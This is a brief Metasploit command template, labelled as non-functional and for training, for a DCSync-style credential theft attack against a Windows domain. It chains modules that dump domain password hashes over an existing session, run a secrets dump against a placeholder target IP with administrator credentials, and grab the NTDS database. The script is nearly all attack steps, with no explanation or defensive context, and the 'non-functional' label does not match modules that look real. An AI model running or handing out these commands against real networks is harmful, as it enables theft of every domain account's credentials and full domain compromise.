# DCSync Attack Template
# For Training Use – Non-functional Template

use post/windows/gather/credentials/domain_hashdump
set SESSION 1
set METHOD dcsync
run

use auxiliary/gather/windows_secrets_dump
set RHOSTS <TARGET_IP>
set SMBUser administrator
set SMBPass password123
set SMBDomain CORP
run

use post/windows/gather/ntds_grabber
set SESSION 1
run